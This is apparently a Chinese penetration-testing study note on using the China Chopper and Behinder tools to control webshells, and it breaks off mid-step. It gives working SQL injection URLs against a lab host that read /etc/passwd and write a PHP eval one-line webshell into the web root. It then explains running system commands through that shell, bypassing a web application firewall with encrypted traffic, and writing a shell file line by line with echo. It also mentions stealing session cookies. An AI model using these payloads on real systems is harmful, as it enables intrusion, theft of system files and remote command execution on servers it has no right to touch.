10-菜刀连接木马

时间:2024-04-17 17:32:06

找到了漏洞后,并且上传了木马之后才能使用的两款工具

中国菜刀和冰蝎

想办法获取别人的cookie,cookie中有session-id

一、中国菜刀

1、必须提前已经完成木马植入然后才能使用

2、木马必须是POST请求,参数自定义,在菜刀里给出正确的参数名。

是属于辅助工具,并且菜刀的传输过程是明文传输的,目前已经被WAF进行防护了。

先看是否存在注入点,有下图所示则表示存在注入点==》可以进行接下来的操作

http://192.168.74.133/security/read.php?id=1 and 1=2 union select 1,2,3,4,5,6

有文件,则说明可以读任意路径的文件

http://192.168.74.133/security/read.php?id=1 and 1=2 union select 1,2,3,(select load_file("/etc/passwd")),5,6

写入一句话的木马进行探测,如果嗅探成功后在进行大马的上传

http://192.168.74.133/security/read.php?id=1 and 1=2 union select 1,2,3,"<?php @eval($_POST[a]) ; ?>",5,6 into outfile "/opt/lampp/htdocs/security/temp/mm.php"

在post中写入PHP的代码,a=phpinfo();可以获取你想要的配置信息,也可以用system函数来输入命令

接下来就可以连接菜刀,使用菜刀来连接木马然后就可以查看到服务器里面的东西了

使用wireshark进行抓包用来分析流量

假设菜刀被WAF挡了

二、Behinder冰蝎

冰蝎是加密传输,防火墙很难分析出流量特征,比较容易绕开防火墙。

所以需要先上传一个冰蝎自己的带加密功能的shell脚本,这个上传shell的过程通常有以下几种方式:

1)直接在命令行运行命令,按行用echo 写入

a=system('echo "$post=file_get_contents("php://input");">> /opt/lampp/htdocs/security/temp/muma.php');